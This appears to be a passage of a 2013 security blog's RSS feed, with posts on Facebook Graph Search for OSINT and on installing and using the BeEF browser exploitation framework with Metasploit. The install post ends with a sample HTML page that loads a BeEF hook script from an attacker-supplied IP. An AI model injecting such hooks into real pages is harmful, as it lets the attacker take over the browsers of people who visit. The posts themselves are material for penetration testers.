<p>The aim of Facebook graph as far as I can tell is to allow more powerful searching of all the juicy information that Facebook holds on their products, sorry I mean users. The theory being if you want to know a good restaurant in a certain area you can do a simple search query &#8220;Places people like to eat in London&#8217; and it will respond with a load of recommendations based on the information / recommendations / likes of your friends, and their friends friends. The same can be done to check who of your friends or associates live in a certain area, have certain hobbies, work certain places and such like. The plan according to the video from the Facebook founder says it will just be early days and they will offer more over time with regards to search options. From looking at Facebook Graph I see the following options to search against:</p>
<p>My Friends, Photos of My Friends, Restaurants Nearby, Games My Friends Play, Music My Friends Like, Photos I have Liked, Groups My Friends Are In, Apps My Friends Use, Movies My Friends Like, Current Cities Of My Friends and so on.</p>
<p>I think this gives a little insight to some of the information available. The aim is to provide more personal intelligent information for users of Facebook and the results in theory should be more relevant than that of a search engine. Interestingly though, there is an option at the bottom to use the search query on the Internet, and this uses Microsofts Bing Search Engine.</p>
<p>So I think this service will help with further identify that circle of trust between people, common interests, favorite locations and alike. Some of this information is accessible today, but it can be like a needle in a hay stack, perhaps this makes that needle a little bigger <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  No doubt there will be privacy configurations, but at the same time I cant help but think that those settings wouldn&#8217;t be able to restrict to much information, as without the information there is no product. Time will tell I guess, but certainly something worth following as it develops in my opinion.</p>
<p>If you have not heard of Facebook Graph check out the <a href="https://www.facebook.com/about/graphsearch" target="_blank">Facebook release info</a>.<br />
And if you are a developer, you might want to check out the <a href="https://developers.facebook.com/docs/reference/api/" target="_blank">Graph API</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/01/17/facebook-graph-social-engineering-osint-gets-graphical/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How To Integrate Metasploit with BeEF &#8230; Browser Exploitation Framework</title>
		<link>http://www.subliminalhacking.net/2013/01/07/how-to-integrate-metasploit-with-beef-browser-exploitation-framework/</link>
		<comments>http://www.subliminalhacking.net/2013/01/07/how-to-integrate-metasploit-with-beef-browser-exploitation-framework/#comments</comments>
		<pubDate>Mon, 07 Jan 2013 23:48:32 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[BeEF]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Adobe CoolType]]></category>
		<category><![CDATA[Browser Exploitation Framework]]></category>
		<category><![CDATA[CVE-2010-2883]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pentester]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1414</guid>
		<description><![CDATA[So the Browser Exploitation Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun. Its like a Social Engineers / Pentesters wet dream&#8230; Its a Geek thing This video shows you how you can [...]]]></description>
				<content:encoded><![CDATA[<p>So the Browser Exploitation Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun. Its like a Social Engineers / Pentesters wet dream&#8230; Its a Geek thing <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>This video shows you how you can integrate Metasploit into BeEF, and gives a quick example of exploiting a Windows XP SP3 box with Adobe 9 installed that is vulnerable to the Adobe CoolType Buffer Overflow Vulnerability (CVE-2010-2883).</p>
<p><em>Note: You will need Metasploit installed with some form of database support, such as postgres. This video does not show you how to install and configure metasploit and postgres.</em></p>
<p><iframe src="http://www.youtube.com/embed/BQf5Gv9dprw" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/01/07/how-to-integrate-metasploit-with-beef-browser-exploitation-framework/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Autorun Modules in BeEF &#8230; Browser Exploitation Framework</title>
		<link>http://www.subliminalhacking.net/2013/01/03/how-to-autorun-modules-in-beef-browser-exploitation-framework/</link>
		<comments>http://www.subliminalhacking.net/2013/01/03/how-to-autorun-modules-in-beef-browser-exploitation-framework/#comments</comments>
		<pubDate>Thu, 03 Jan 2013 19:56:37 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[BeEF]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[autorun]]></category>
		<category><![CDATA[Browser Exploitation Framework]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pentester]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1375</guid>
		<description><![CDATA[Unless you are the Social Engineer with the fastest fingers in the west, you are going to have a challenge on your hands trying to initiate the various BeEF modules of interest when you initially hook a compromised host. So to have this happen automagically we can make changes to the individual modules config file. [...]]]></description>
				<content:encoded><![CDATA[<p>Unless you are the Social Engineer with the fastest fingers in the west, you are going to have a challenge on your hands trying to initiate the various BeEF modules of interest when you initially hook a compromised host. So to have this happen automagically we can make changes to the individual modules config file. This video shows you just how easy it is to achieve.</p>
<p><iframe src="http://www.youtube.com/embed/qATHn_iKCas" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
<p><em>Note: At the time of publishing this post not all modules are successfully autorunning. A ticket has been opened to request a fix and you can monitor the progress <a href="https://github.com/beefproject/beef/issues/769" target="_blank">here</a>.</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/01/03/how-to-autorun-modules-in-beef-browser-exploitation-framework/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Install BeEF &#8230; Browser Exploitation Framework</title>
		<link>http://www.subliminalhacking.net/2013/01/03/how-to-install-beef-browser-exploitation-framework/</link>
		<comments>http://www.subliminalhacking.net/2013/01/03/how-to-install-beef-browser-exploitation-framework/#comments</comments>
		<pubDate>Thu, 03 Jan 2013 13:02:17 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[BeEF]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Browser Exploitation Framework]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pentester]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1361</guid>
		<description><![CDATA[The Browser Exploitation Framework (BeEF) is an excellent tool for Social Engineers and Pentesters. This video provides a quick How To on installing it under Linux. The install from start to finish takes around 10 minutes, but the video has been condensed as to not waste your time. A list of some of the commands [...]]]></description>
				<content:encoded><![CDATA[<p>The Browser Exploitation Framework (BeEF) is an excellent tool for Social Engineers and Pentesters. This video provides a quick How To on installing it under Linux. The install from start to finish takes around 10 minutes, but the video has been condensed as to not waste your time. A list of some of the commands I used for copy and pasting purposes are provided below.</p>
<p><iframe src="http://www.youtube.com/embed/mTGzvnJs3P8" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
<h3>Commands used:</h3>
<p>lsb_release -a</p>
<p>sudo apt-get update</p>
<p>sudo apt-get install curl git ruby build-essential libsqlite3-ruby libsqlite3-dev libssl-dev</p>
<p>bash &lt; &lt;(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer )</p>
<p>sudo echo [[ -s "$HOME/.rvm/scripts/rvm" ]] &amp;&amp; . &#8220;$HOME/.rvm/scripts/rvm&#8221; # Load RVM function&#8217; &gt;&gt; ~/.bash_profile</p>
<p>rvm install ruby-1.9.2-p290</p>
<p>gem install bundler</p>
<p>git clone git://github.com/beefproject/beef.git</p>
<p>bundle install</p>
<p>nano config.yaml <em>(in the root of the beef directory)</em></p>
<div class="divider">&nbsp;</div>
<p><em><strong>Helpful Hint</strong> &#8211; To enable the BeEF hook in your web page during an engagement add the hook script in before or after the body in your html file. Here is an example:</em></p>
<p><em>&lt;html&gt;</em><br />
<em>&lt;body&gt;</em><br />
<em>HOOK ME BABY ONE MORE TIME!!</em><br />
<em>&lt;/body&gt;</em><br />
<em>&lt;script src=&#8221;http://YOUR-IP-HERE:3000/hook.js&#8221;&gt;&lt;/script&gt;</em><br />
<em>&lt;/html&gt;</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/01/03/how-to-install-beef-browser-exploitation-framework/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
